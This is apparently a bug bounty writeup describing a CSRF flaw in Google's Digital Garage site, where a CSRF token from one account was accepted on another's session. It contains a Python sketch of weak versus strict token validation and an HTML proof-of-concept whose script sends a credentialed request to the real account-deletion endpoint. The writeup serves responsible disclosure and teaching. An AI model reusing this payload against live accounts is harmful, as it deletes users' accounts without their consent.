Google Bug Bounty: CSRF in learndigital.withgoogle.com

Hi everyone,
This is my first Google bug bounty writeup. I want to tell you about a CSRF vulnerability in Google Digital Garage.

Have you ever heard of the Google Digital Garage? “Online courses from Google that are designed to help you grow your career or business”: that is the tagline from the website of one of Google’s products.

TL;DR: a few months ago I read a writeup HERE about a vulnerability in the Google subdomain learndigital.withgoogle.com, so I tried looking around myself. In short, I found a CSRF vulnerability caused by a lack of proper CSRF token validation, which led to account deletion, among other things.

What is CSRF?

Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other.

Reproduction

I registered an account with my email to see more features. While looking around, my profile page caught my interest: I found a “delete account” button. I immediately thought of CSRF and tried to capture the request using Burp Proxy, but Google uses an xsrf_token to protect each request.

After thinking for a while, I created a second account to act as the victim. Then I captured the victim’s account-deletion request and replaced its xsrf_token with the first account’s (the attacker’s) xsrf_token.

When I refreshed the profile page in the browser…

As you can see, tokens from other users are accepted. I realized that Google did not validate the token properly on the server side: a token was accepted as long as it was valid, without being tied to the session of the logged-in user. So the CSRF protection was not implemented correctly.
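To make the root cause concrete, here is an added example (my own illustration, not Google’s code and not part of the original writeup) of the two server-side checks side by side: a weak validator that only asks “is this a token the server issued?” and a strict one that asks “is this the token bound to *this* session?”. The session store, the endpoint name `handle_wipeout` and the user names are constructed stand-ins.

```python
import hmac
import secrets

# Constructed in-memory session store: session_id -> {"user": ..., "xsrf_token": ...}.
# It stands in for whatever server-side store issues the xsrf_token on page load.
SESSIONS: dict[str, dict] = {}
# Weak pattern: a global set of every token the server has ever issued.
ISSUED_TOKENS: set[str] = set()


def create_session(user: str) -> str:
    """Create a session for `user` and issue it a fresh CSRF token."""
    session_id = secrets.token_urlsafe(32)
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id] = {"user": user, "xsrf_token": token}
    ISSUED_TOKENS.add(token)
    return session_id


def csrf_token_for(session_id: str) -> str:
    """Return the token the server handed to this session (what the page embeds)."""
    return SESSIONS[session_id]["xsrf_token"]


def weak_validate(session_id: str, submitted_token: str) -> bool:
    """Flawed check: accepts any token the server ever issued, no matter which
    session it belongs to. This is the bug class in the writeup: a token from
    one account is accepted on another account's session."""
    return session_id in SESSIONS and submitted_token in ISSUED_TOKENS


def strict_validate(session_id: str, submitted_token: str) -> bool:
    """Correct check: the token must equal the one bound to *this* session.
    hmac.compare_digest keeps the comparison constant-time."""
    session = SESSIONS.get(session_id)
    if session is None or not submitted_token:
        return False
    return hmac.compare_digest(session["xsrf_token"], submitted_token)


def handle_wipeout(session_id: str, submitted_token: str, validate) -> dict:
    """Hypothetical account-deletion handler; returns a dict describing the
    outcome instead of touching any real data."""
    if not validate(session_id, submitted_token):
        return {"status": 403, "deleted": False}
    user = SESSIONS[session_id]["user"]
    return {"status": 200, "deleted": True, "user": user}


def demo() -> dict:
    """Replay the writeup's scenario: the attacker's token arrives together with
    the victim's session cookie. Returns the outcome under each validator."""
    victim = create_session("victim@example.com")      # constructed
    attacker = create_session("attacker@example.com")  # constructed
    attacker_token = csrf_token_for(attacker)
    return {
        "weak": handle_wipeout(victim, attacker_token, weak_validate),
        "strict": handle_wipeout(victim, attacker_token, strict_validate),
        "strict_own_token": handle_wipeout(victim, csrf_token_for(victim), strict_validate),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Under `weak_validate` the victim’s account is deleted with the attacker’s token; under `strict_validate` the same request is rejected with 403, while the victim’s own token still works. The property that matters is that the token is bound to the session (or derived from it with a keyed MAC), not merely that it is a token the server recognizes.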

I wrote a simple HTML page to try it in the browser:

<!DOCTYPE html>
<html>
<head>
 <title>Google | CSRF PoC</title>
</head>
<body>
<center>
  <h1>CSRF PoC | Delete Account</h1>
  <script>
  const url = 'https://learndigital.withgoogle.com/digitalgarage/profile/wipeout';

  fetch(url, {
    method: 'POST',
    credentials: 'include',
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: 'xsrf_token=<attacker_xsrf_token>'
  });
  </script>
  </center>
</body>
</html>

When I executed the code, I got the expected response.
I quickly reported this issue to Google and received confirmation of the bug:

I’m looking forward to sharing more of my adventures in the future, stay tuned!

Timeline:
  • Nov 16, 2019: Report to Google
  • Nov 18, 2019: Triaged
  • Nov 22, 2019: Google confirmed that the report is a duplicate
